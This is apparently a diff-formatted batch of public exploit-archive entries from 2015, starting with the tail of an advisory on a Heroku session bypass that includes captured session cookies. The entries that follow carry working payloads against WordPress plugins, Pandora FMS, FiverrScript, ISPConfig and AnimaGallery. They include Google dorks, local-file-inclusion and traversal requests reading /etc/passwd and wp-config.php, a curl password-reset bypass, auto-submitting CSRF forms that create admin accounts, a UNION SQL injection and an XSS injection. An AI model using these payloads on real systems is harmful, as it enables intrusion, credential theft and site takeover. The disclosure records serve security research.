      Expires[0]
      X-Frame-Options[SAMEORIGIN]
      x-ua-compatible[IE=Edge,chrome=1]
      Set-Cookie[_my-heroku_session=BAh7CUkiEF9jc3JmX3Rva2VuBjoGRUZJIjFsZGdXRThzZ0IvNDJIMWJWM1dyU3ZXWXlpZUhMa21YWFVEc2lsV2ExR1ZRPQY7AEZJIg9zZXNzaW9uX2lkBjsAVEkiJWQ2OTI4OTJkOGQzMDliMzY5YWY5ODFmOThhNWU4NGU4BjsAVEkiC2luX29yZwY7AEZGSSIQcmVkaXJlY3RfdG8GOwBGIg0vYWNjb3VudA%3D%3D--3aacd80781b201de87c148efa8ef6adb5a004d99; path=/; secure; HttpOnly]
      x-request-id[5e276c4f-1382-4328-ae95-b87a73376089]
      x-runtime[0.006972]
      x-rack-cache[miss]
      Via[1.1 vegur]
 17:56:39.215[207ms][total 207ms] Status: 304[Not Modified]
 GET https://dataclips.heroku.com/ Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[dataclips.heroku.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://dataclips.heroku.com/]
      Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; _session_id=ZXNtT29YN3FZajNrQ2U0OTBWbzZ2VHlWSUJDdnVtNmV3TEtLc25ZT0h5MW9rS2FRVzRZblpLRktRQkd3ZXZPY2hwMm41a1VjSlNEY3VGbkVXYjRQTWVLcmFsTEk4MDQvc1laWTViZ2JVZ2RzUEdMNFpGY2JZRTdwdWN3K3ZWTW56VEVpcFU4OHg1T1BQMHBGbTdkNlNFakpZMjVMVE1mNnZxM2dPL3BNKzZ1VVljeTRGUk4rbEhqcld1UEdBR3lCdDM5RkxpZk1hZWsyZkFyY0dGZmVxeUlheUt5NXhaNGNJb1ZTR2VkL1o0ZHM2OW9HTnBZb1dOZys3dVpGSFdKRDA1TysvaHg2enlWMGhLaVhnUmxwbnQ0S1JMeVl3WHFvZWwvaUI2Qy9rQU9aMmhqNllDVVJXa0FsNXZwZEdCQVpWS2d0VTlvMjZPQ1hENy9tZmE0REdZT1NvdmN3SDcrMG15dElDRlFNVkJEN24yWS9lUU03RjduTDkzQlAxcnpkNHhldEhQOVpyZjNUM3JVaU5Fek9BcmI5WGNsN0c2dFRPMTZqMjRyNnZnRndBYi9rWEcyTGMwMTZadGxhQmVWQ1hQUURyUk9tZjZtZitTSk1LMmNhQmFkOEJ3NFQreGdxUS9qeXFrUHdNQWt5cXJvRWxTQis1R1lTWThkeHI4YzRrQVVROFdhTzZEb0pMZTR3K3pLZXBoUkVMMlBncUNQZlpleTRPY1U1cHJrPS0tMHFTV09tekRBajVKeXlPS0dESE82QT09--f620fe024be3e5610f3af2885c5b2758b30cffbf; __utmb=148535982.65.9.1411228524365]
      Connection[keep-alive]
      If-None-Match["015d655373394c49a35217e89173847e"]
   Response Header:
      Content-Length[0]
      Connection[keep-alive]
      Server[nginx/1.5.7]
      Date[Sat, 20 Sep 2014 15:56:49 GMT]
      status[304 Not Modified]
      Strict-Transport-Security[max-age=31536000]
      X-XSS-Protection[1; mode=block]
      x-content-type-options[nosniff]
      X-Frame-Options[SAMEORIGIN]
      Etag["015d655373394c49a35217e89173847e"]
      Cache-Control[max-age=0, private, must-revalidate]
      Set-Cookie[_session_id=Ync2S1ZnSHM3M2FMZC95S1pZeFQrRnc4bWx0WGpjV21rL2k4UEh4WDhyY2lPN29ENHRydzd1aVE4WS81RGMxdUR3Z21nS2R4NUJyNjdLNEs4MWpieGk5QXNhS1ZEeUxlcldqV3UySXJ4Z3k4NkY2VHhCU3ZxT3NyR2RnYzNlTFdycmFiTXJHM0FqU0lyVEp4ZTlhd3ptWjIzM01mMDdnZXJocnc0Q2Y0eHhvR2xoY29haVFWcjZHRExXeXhaVFZRT0JqRmRWSmY4Yk8weHdNZXZOMU5NMCtYUWVzVUIrQW9GblRPRS9TU0twMGVLTnZjRWpjbFY4NC9LaDMzb2hUVi84L08zUUV1WEpTMEMxMTlqektjQy8zT1JrMC9RVm5JODJjMnVicXJpRi9xb1FXeThSZ3JJc2s0SndKUzM4NjJ0SzhudkVncWdJT2NDSHU5N1BhNXpiT0ZQRmY3Q2NwRzhjcFMrbzloTzlRYUJ0Wi9VbVllMnhEYjRYLzlrRkZwZGhPUFFMckJacExnVlZOMi96NmdnWEltVnB0QTFLV1JxbkZMRG9GaStGY1RQZ28wSnpJT1JMaUoyWUxTUUNRVHZwSmRhVGNzL3NkWktuZk96YjVkVTBQSVBaVzNZNytJczJra21yOWQvVHB4bVl5QkJiblVuaEJZTzZVRnpvZjNMUXF5YnZBM01DYU8vZkp2TWNQRUV2c1VjeVRLOUpOc3VLWWYvUlY5dnhzPS0tTjd6WW9BWUE1a3ZSWE9wRXEyRmVsZz09--a0b8c8a8f07996dbd6a5c70dbb79cd772dd3db77; path=/; expires=Sun, 21 Sep 2014 15:56:49 -0000; secure; HttpOnly]
      x-request-id[b278f0fa-e866-4fd5-91cb-26c023746359]
      x-runtime[0.027082]
      Via[1.1 vegur]
 17:56:48.969[192ms][total 192ms] Status: 304[Not Modified]
 GET https://dataclips.heroku.com/clips/new Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[dataclips.heroku.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://dataclips.heroku.com/]
      Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; _session_id=Ync2S1ZnSHM3M2FMZC95S1pZeFQrRnc4bWx0WGpjV21rL2k4UEh4WDhyY2lPN29ENHRydzd1aVE4WS81RGMxdUR3Z21nS2R4NUJyNjdLNEs4MWpieGk5QXNhS1ZEeUxlcldqV3UySXJ4Z3k4NkY2VHhCU3ZxT3NyR2RnYzNlTFdycmFiTXJHM0FqU0lyVEp4ZTlhd3ptWjIzM01mMDdnZXJocnc0Q2Y0eHhvR2xoY29haVFWcjZHRExXeXhaVFZRT0JqRmRWSmY4Yk8weHdNZXZOMU5NMCtYUWVzVUIrQW9GblRPRS9TU0twMGVLTnZjRWpjbFY4NC9LaDMzb2hUVi84L08zUUV1WEpTMEMxMTlqektjQy8zT1JrMC9RVm5JODJjMnVicXJpRi9xb1FXeThSZ3JJc2s0SndKUzM4NjJ0SzhudkVncWdJT2NDSHU5N1BhNXpiT0ZQRmY3Q2NwRzhjcFMrbzloTzlRYUJ0Wi9VbVllMnhEYjRYLzlrRkZwZGhPUFFMckJacExnVlZOMi96NmdnWEltVnB0QTFLV1JxbkZMRG9GaStGY1RQZ28wSnpJT1JMaUoyWUxTUUNRVHZwSmRhVGNzL3NkWktuZk96YjVkVTBQSVBaVzNZNytJczJra21yOWQvVHB4bVl5QkJiblVuaEJZTzZVRnpvZjNMUXF5YnZBM01DYU8vZkp2TWNQRUV2c1VjeVRLOUpOc3VLWWYvUlY5dnhzPS0tTjd6WW9BWUE1a3ZSWE9wRXEyRmVsZz09--a0b8c8a8f07996dbd6a5c70dbb79cd772dd3db77; __utmb=148535982.67.9.1411228524365; optimizelyPendingLogEvents=%5B%5D]
      Connection[keep-alive]
      If-None-Match["809917d3d9ac788b43864dd9470788d6"]
   Response Header:
      Content-Length[0]
      Connection[keep-alive]
      Server[nginx/1.5.7]
      Date[Sat, 20 Sep 2014 15:56:59 GMT]
      status[304 Not Modified]
      Strict-Transport-Security[max-age=31536000]
      X-XSS-Protection[1; mode=block]
      x-content-type-options[nosniff]
      X-Frame-Options[SAMEORIGIN]
      Etag["809917d3d9ac788b43864dd9470788d6"]
      Cache-Control[max-age=0, private, must-revalidate]
      Set-Cookie[_session_id=L0FpUHg1M3ZuUkNUeWtxVFNxdW1UY3p0QkM0OUNsVUMyL2VBN24xZVh3d1hlN2s5VUI5Tjl1b3BzV00yaW93elp0RGNKV3cxODh0VVVmSG9CeC9NSDh0WVVvekVqUkV5bHFaSStCUnkrZ21iWGRmVy96K210K01tQXo1SkxHRldLVVZYMFdiazVkcG96N3ZUWGZhK28vRWh5WS9id0ZIWTBTdU51a1dUaWRLK1gvWlI0WFRScW5PMU1MOURsLzV0QnRqdUhZWE9SSzdZRzVSazEzeko2Y01jZjFGRGNiUVRpQ0doSitISHpjSG8xT1JGamtVeDRKRjhBMHIxZkl5Q3N6bW9BODJqekNDMnhpRjExa3N3SlJpbU4xT1Rvc0Y3Uy9wNHdmMUVMbzV5OGxwK0N2bmJQdVJRazlOamRQbkJ5RXJuVmwvOW94azJhTHRMUzY4WkszdkU0cG9zaExXQ3FWUXZqRXpmc01DOFB5V1Nhbkp0bzhlejVCZGFaeFh6RGM3TTFqYkV5TXpGNVF3SkptRy95dkVTd1IyRS93SkVTVjYrRnF1dlFLa0Q2cGdKdkVDV0NoSkdrZDBiRzVyRFRmVHE3Z0hBb1pQbEM4RTBsT3NsNURYRlZoL0dSNUtsVjRjVFc3cFZFME1DUElhblRxTUdZYVMyUUFUaWQ0YUVMTytLZytVOHJaa3RQYVJzcUZ3RGZEWEFOdTBWT2Y1ZVQ0b0kzK2k3Z3MwPS0tQnhFMFYyVGxDODRjSXpIQ3g5R1ZhQT09--1ea1df64ab1a053df5ea5a4eed8a3bda7db428a8; path=/; expires=Sun, 21 Sep 2014 15:56:59 -0000; secure; HttpOnly]
      x-request-id[433e3190-bc29-4192-9a61-90754e41bb44]
      x-runtime[0.029809]
      Via[1.1 vegur]
 Reference(s):
 https://dataclips.heroku.com/
 https://dataclips.heroku.com/clips/new
 https://postgres.heroku.com/databases
 -
 https://dashboard.heroku.com/account
 https://dashboard.heroku.com/login
 https://id.heroku.com/logout
 Solution - Fix & Patch:
 =======================
 The vulnerability can be patched by a secure proof of the dataclip and postgres service values that are processing to use the login credentials.
 The service needs to process expired sessions through all portal in the same or next request without allowing to access separtly requested section with the expired session credentials.
 Security Risk:
 ==============
 The security risk of the re-auth session bypass vulnerability in the dataclip and postgres information page is estimated as high. (CVSS 6.1)
 Credits & Authors:
 ==================
 Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
 Disclaimer & Information:
 =========================
 The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
 or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
 in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
 or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
 consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
 policies, deface websites, hack into databases or trade with fraud/stolen material.
 Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
 Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
 Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
 Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
 Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
 Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/
 Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
 electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
 Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
 is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
 (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
 				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
 -- 
 VULNERABILITY LABORATORY - RESEARCH TEAM
 SERVICE: www.vulnerability-lab.com
 CONTACT: research@vulnerability-lab.com
 PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
--- a/platforms/php/webapps/37243.txt
+++ b/platforms/php/webapps/37243.txt
@ -0,0 +1,31 @@
 # Exploit Title: wp-imagezoom Remote Image Upload
 # Google Dork: filetype:php inurl:"/wp-content/plugins/wp-imagezoom" & inurl:"?id="
 # Date: 06.06.2015
 # Exploit Author: T3N38R15
 # Software Link: https://downloads.wordpress.org/plugin/wp-imagezoom.1.1.0.zip
 # Version: 1.1.0
 # Tested on: 	Windows	(Firefox)
 		Linux	(Firefox)
 The affected file is the div_img.php it allowed anybody to upload jpg files.
 /wp-content/plugins/wp-imagezoom/div_img.php?src=http://domain.com/img.jpg&cl=100&dl=100
 would upload the file to the default directory :
 /wp-content/plugins/wp-imagezoom/work/http_cln__sls__sls_domain.com_sls_img.jpg/
 the first one is then your picture ( it is only 469x469 the rest is cut out ), the other are zoomed/cuttet version of it.
 it also support a FPD : 
 http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?src=
 the variable org_img have the value of the current location to the work directory.
 We can also delete entry's with
 http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=
 following options are avaliable for the cmd parameter :
 http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=delall
 http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=delunn
 http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=delone&src=yourwisheddeleted
 http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=delovr&maxsize=size of image
 Proof of concept : http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?src=http://static.zerochan.net/Frankenstein.(Noblesse).full.415661.jpg&cl=100&dl=100
 Greets to Team Madleets/leets.pro & VIRkid ;)
 Regards T3N38R15
--- a/platforms/php/webapps/37252.txt
+++ b/platforms/php/webapps/37252.txt
@ -0,0 +1,23 @@
 # Exploit Title: Wordpress Plugin RobotCPA V5 - Local File Include
 # Google Dork: inurl:"/wp-content/plugins/robotcpa/"
 # Date: 09.06.2015
 # Exploit Author: T3N38R15
 # Vendor Homepage: http://robot-cpa.good-info.co/
 # Version: 5V
 # Tested on: Windows (Firefox)
                   Linux      (Firefox)
 The affected file is f.php and the get-parameter "l" is vulnerable to local file inclusion.
 We just need to base64 encode our injection.
 Like that : 
 php://filter/resource=./../../../wp-config.php
 cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==
 or
 file:///etc/passwd
 ZmlsZTovLy9ldGMvcGFzc3dk
 our injection look then like that :
 http://domain.com/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk
 and we can see the content of the passwd file.
 greets to Black Sniper
 Regards T3N38R15
--- a/platforms/php/webapps/37253.txt
+++ b/platforms/php/webapps/37253.txt
@ -0,0 +1,26 @@
 # Exploit Title: Paypal Currencucy Converter Basic For Woocommerce File Read
 # Google Dork: inurl:"paypal-currency-converter-basic-for-woocommerce"
 # Date: 10/06/2015
 # Exploit Author: Kuroi'SH
 # Software Link:
 https://wordpress.org/plugins/paypal-currency-converter-basic-for-woocommerce/
 # Version: <=1.3
 # Tested on: Linux
 Description:
 proxy.php's code:
 <?php
 $file = file_get_contents($_GET['requrl']);
 $left=strpos($file,'<div id=currency_converter_result>');
 $right=strlen($file)-strpos($file,'<input type=hidden name=meta');
 $snip= substr($file,$left,$right);
 echo $snip;
 ?>
 Based on user input, the content of a file is printed out (unfortunately
 not included) so any html file can be loaded, and an attacker may be able
 to read  any local file which
 is not executed in the server.
 Example:
 http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd
 POC:
 curl --silent --url
 http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd
--- a/platforms/php/webapps/37254.txt
+++ b/platforms/php/webapps/37254.txt
@ -0,0 +1,27 @@
 # Exploit Title: Wordpress History Collection <=1.1.1 Arbitraty File
 Download
 # Google Dork: inurl:plugins/history-collection
 # Date: 10/06/2015
 # Exploit Author: Kuroi'SH
 # Software Link: https://wordpress.org/plugins/history-collection/
 # Version: <=1.1.1
 # Tested on: Linux
 I-Description:
 Wordpress history collection plugin contains a file called download.php
 which is not filtering the GET input, it then uses this get input value to
 force the download of a file.
 (download.php, line 44):
 header("Content-Disposition: attachment;
 filename=\"".basename($filename)."\";" );
 2:Proof of concept:
 http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=yourfile
 http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php
 php -r "echo @file_get_contents('
 http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php')
 ;"
 Greetz:
 Moh Ooasiic, Virus Os, Black Sniper, T3N38R15, Green Ghost, n37_worm,
 MuhmadEmad, redsm0ke
 By Kuroi'SH
--- a/platforms/php/webapps/37255.txt
+++ b/platforms/php/webapps/37255.txt
@ -0,0 +1,50 @@
 # Exploit Title: Authentication Bypass in Pandora FMS
 # Google Dork:
 	intitle:"Pandora FMS - The Flexible Monitoring System"
 	intitle:"Pandora FMS - el Sistema Flexible de Monitorización"
 # Date: 10/06/2015
 # Exploit Author: Manuel Mancera (sinkmanu)    |    mmancera (at) a2secure (dot) com
 # Vendor Homepage: http://pandorafms.com/ <http://pandorafms.com/>
 # Software Link: http://pandorafms.com/ <http://pandorafms.com/>
 # Version: 5.0, 5.1
 # Vulnerability Type : Authentication Bypass
 # Severity : High
 ### Description ###
 A vulnerability has been discovered in Pandora FMS that permits an unautheticated user to change the password for any Pandora user without knowing the actual user password. The vulnerability occurs at the login screen due to the session not being checked before the password is changed.
 ### Proof of Concept ###
 URL: /index.php
 Method: POST
 Payload: renew_password=1&login=admin
 Payload2:
 renew_password=1&login=admin&password_new=newpass&password_confirm=newpass
 ### Exploit ###
 curl -d
 "renew_password=1&login=admin&password_new=newpass&password_confirm=newpass"
 http://localhost/index.php <http://localhost/index.php>
 ### Solution ###
 Apply the latest patches available at the vendor website.
 ####################################################################
 Disclaimer
 --------------------
 All information is provided without warranty. The intent is to provide
 information to secure infrastructure and/or systems, not to be able to
 attack or damage. Therefore A2Secure shall not be liable for any direct
 or indirect damages that might be caused by using this information.
 ####################################################################
--- a/platforms/php/webapps/37257.txt
+++ b/platforms/php/webapps/37257.txt
@ -0,0 +1,39 @@
 # Exploit Title: FiverrScript CSRF Vulnerability (add New admin)
 # Author: Mahmoud Gamal (@Zombiehelp54)
 # Google Dork: intext:Powered by FiverrScript
 # Date: 10/06/2015
 # Exploit Author: Scriptolution
 # Vendor Homepage: http://scriptolution.com
 # Software Link: http://fiverrscript.com
 # Version: 7.2
 # Tested on: Windows 
 FiverrScript is vulnerable to CSRF attack (No CSRF token in place) meaning
 that if an admin user can be tricked to visit a crafted URL created by
 attacker (via spear phishing/social engineering), a form will be submitted
 to (http://localhost/fiverrscript/administrator/admins_create.php) that
 will add a new user as administrator.
 Once exploited, the attacker can login to the admin panel (
 http://localhost/fiverrscript/administrator/index.php)
 using the username and the password he posted in the form.
 CSRF PoC Code
 =============
 <form action="http://localhost/fiverrscript/administrator/admins_create.php"
 method="post" id="main_form" name="main_form"
 enctype="multipart/form-data"><input type="hidden" id="submitform"
 name="submitform" value="1">
 <input type="hidden" name="username" value="attackerUsername">
 <input type="hidden" name="password" value="attackerPreferedPW" >
 <input type="hidden" name="email" value="attackeremail@something.com">
 </form>
 <script>
 document.forms[0].submit();
 </script>
 Reported to script owner.
 Security Level:
 ================
 High
--- a/platforms/php/webapps/37259.txt
+++ b/platforms/php/webapps/37259.txt
@ -0,0 +1,87 @@
 Advisory ID: HTB23260
 Product: ISPConfig
 Vendor: http://www.ispconfig.org
 Vulnerable Version(s): 3.0.5.4p6  and probably prior
 Tested Version: 3.0.5.4p6 
 Advisory Publication:  May 20, 2015  [without technical details]
 Vendor Notification: May 20, 2015 
 Vendor Patch: June 4, 2015 
 Public Disclosure: June 10, 2015 
 Vulnerability Type: SQL Injection [CWE-89], Cross-Site Request Forgery [CWE-352]
 CVE References: CVE-2015-4118, CVE-2015-4119
 Risk Level: High 
 CVSSv2 Base Scores: 5.8 (AV:N/AC:L/Au:M/C:P/I:P/A:P),  7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)
 Solution Status: Fixed by Vendor
 Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 -----------------------------------------------------------------------------------------------
 Advisory Details:
 High-Tech Bridge Security Research Lab discovered two vulnerabilities in a popular hosting control panel ISPConfig. The vulnerabilities can be exploited to execute arbitrary SQL commands in application database, perform a CSRF attack and gain complete control over the web application.
 1) SQL Injection in ISPConfig: CVE-2015-4118
 The vulnerability exists due to insufficient filtration of input data passed via the "server" HTTP GET parametre to "/monitor/show_sys_state.php" script before executing a SQL query. A remote authenticated attacker can pass arbitrary SQL commands to the vulnerable script and execute them in application’s database. 
 Successful exploitation of this vulnerability will allow an attacker to read, insert and modify arbitrary records in database and compromise the entire web application, but requires the attacker to be authenticated and to have "monitor" privileges. However, in combination with the CSRF vulnerability to which the application is also vulnerable, this vulnerability becomes exploitable by remote non-authenticated attacker. 
 A simple exploit below will display MySQL server version. First, use the following HTTP request to execute the SQL query:
 https://[host]/monitor/show_sys_state.php?state=server&server=-1%20UNION%20SELECT%201,version%28%29%20--%202|-
 After that visit the page mentioned below, the result of MySQL 'version()' function will be displayed in the HTML code of the page:
 https://[host]/monitor/show_data.php?type=mem_usage
 2) CSRF (Cross-Site Request Forgery) in ISPConfig: CVE-2015-4119
 The vulnerability exists due to failure in the "/admin/users_edit.php" script to properly verify the origin of the HTTP request. A remote attacker can create a specially crafted web page with CSRF exploit, trick a logged-in administrator to visit this page and create a new user with administrative privileges. 
 A simple CSRF exploit below creates an administrative account with username "immuniweb" and password "immuniweb":
 <form action = "https://[host]/admin/users_edit.php" method = "POST" enctype = "multipart/form-data">
 <input type="hidden" name="username" value="immuniweb">
 <input type="hidden" name="passwort" value="immuniweb">
 <input type="hidden" name="repeat_password" value="immuniweb">
 <input type="hidden" name="modules[]" value="vm">
 <input type="hidden" name="modules[]" value="mail">
 <input type="hidden" name="modules[]" value="help">
 <input type="hidden" name="modules[]" value="monitor">
 <input type="hidden" name="startmodule" value="vm">
 <input type="hidden" name="app_theme[]" value="default">
 <input type="hidden" name="typ[]" value="admin">
 <input type="hidden" name="active" value="1">
 <input type="hidden" name="language" value="en">
 <input type="submit" id="btn"> 
 </form>
 <script>
 document.getElementById('btn').click();
 </script>
 -----------------------------------------------------------------------------------------------
 Solution:
 Update to ISPConfig 3.0.5.4p7
 More Information:
 http://bugtracker.ispconfig.org/index.php?do=details&task_id=3898
 -----------------------------------------------------------------------------------------------
 References:
 [1] High-Tech Bridge Advisory HTB23260 - https://www.htbridge.com/advisory/HTB23260 - Multiple vulnerabilities in ISPConfig.
 [2] ISPConfig - http://www.ispconfig.org - Hosting Control Panel Software.
 [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
 [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
 [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
 -----------------------------------------------------------------------------------------------
 Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
--- a/platforms/php/webapps/37263.txt
+++ b/platforms/php/webapps/37263.txt
@ -0,0 +1,36 @@
 # Exploit Title: AnimaGallery 2.6 (theme and lang cookie parametre) Local File Include Vulnerability 
 # Date: 2015/06/07 
 # Vendor Homepage: http://dg.no.sapo.pt/ 
 # Software Link:http://dg.no.sapo.pt/AnimaGallery2.6.zip
 # Version: 2.6
 # Tested on: Centos 6.5,php 5.3.2,magic_quotes_gpc=off # Category: webapps
 * Description
 func.php
 line 21 - 22:
 include('themes/'.$THEME.'/templates.php');
 include('languages/'.$LANG.'.php');
 $lang and $THEME parametre from import_theme_lang() function.
 function import_theme_lang()
 {
  $THEME = DEFAULT_THEME;
  if(isset($_COOKIE['theme']) AND !THEME_LOCKED)
    $THEME = $_COOKIE['theme'];  <--  Not Taint Checking
  $LANG = DEFAULT_LANG;
  if(isset($_COOKIE['lang']) AND @file_exists('languages/'.$_COOKIE['lang'].'.php') AND !LANG_LOCKED)
    $LANG = $_COOKIE['lang'];     <--- Not Taint Checking
  return(array($THEME, $LANG));
 }
 * Proof of Concept
 curl "http://192.168.1.101/AnimaGallery/?load=adminboard&mode=1" --cookie "lang=../../../../../../../etc/passwd%00"
 curl "http://192.168.1.101/AnimaGallery/?load=adminboard&mode=1" --cookie "theme=../../../../../../../etc/passwd%00"
--- a/platforms/php/webapps/37264.txt
+++ b/platforms/php/webapps/37264.txt
@ -0,0 +1,76 @@
 # Title: CVE-2015-4010 - Cross-site Request Forgery & Cross-site Scripting in Encrypted
 Contact Form Wordpress Plugin v1.0.4
 # Submitter: Nitin Venkatesh
 # Product: Encrypted Contact Form Wordpress Plugin
 # Product URL: https://wordpress.org/plugins/encrypted-contact-form/
 # Vulnerability Type: Cross-site Request Forgery [CWE-352], Cross-site
 scripting[CWE-79]
 # Affected Versions: v1.0.4 and possibly below.
 # Tested versions: v1.0.4
 # Fixed Version: v1.1
 # Link to code diff: https://plugins.trac.wordpress.org/changeset/1125443/
 # Changelog: https://wordpress.org/plugins/encrypted-contact-form/changelog/
 # CVE Status: CVE-2015-4010
 ## Product Information:
 Secure contact form for WordPress. Uses end-to-end encryption to send user
 information. Not even your hosting provider can view the content.
 Let users send you information in a secure way. Uses I.CX messaging service
 to encrypt user content in their own web browsers before sending to you.
 ## Vulnerability Description:
 The forms in the admin area of the plugin are vulnerable to CSRF, via which
 the contact forms generated are susceptible to XSS via unsanitized POST
 parametre.
 For example, the admin function of updating an existing form can be done
 via CSRF. Hence, by submitting a crafted HTML string in the parametres via
 CSRF, a XSS attack gets launched which affects all the visitors of the
 page(s) containing the contact form.
 ## Proof of Concept:
 <form action="http://localhost/wp-admin/options-general.php?page=conformconf";
 method="post">
 <input type="hidden" name="name" value="required" />
 <input type="hidden" name="email" value="optional" />
 <input type="hidden" name="phone" value="off" />
 <input type="hidden" name="message" value="required" />
 <input type="hidden" name="display_name" value="Example" />
 <input type="hidden" name="recipient_name" value="example" />
 <input type="hidden" name="cfc_page_name" value="" />
 <!-- Wordpress page-id value -->
 <input type="hidden" name="existing_page" value="28" />
 <input type="hidden" name="cfc_selection" value="upd" />
 <input type="hidden" name="iframe_url"
 value=""></iframe><script>alert('XSS!');</script>"
 />
 <input type="submit" value="Update Page">
 </form>
 ## Solution:
 Upgrade to v1.1 of the plugin.
 ## Disclosure Timeline:
 2015-03-26 - Discovered. Contacted developer on support forums.
 2015-03-27 - Contacted developer via contact form on vendor site.
 2015-04-01 - Fixed v1.1 released.
 2015-05-15 - Published disclosure on FD.
 2015-05-16 - CVE assigned
 ## References:
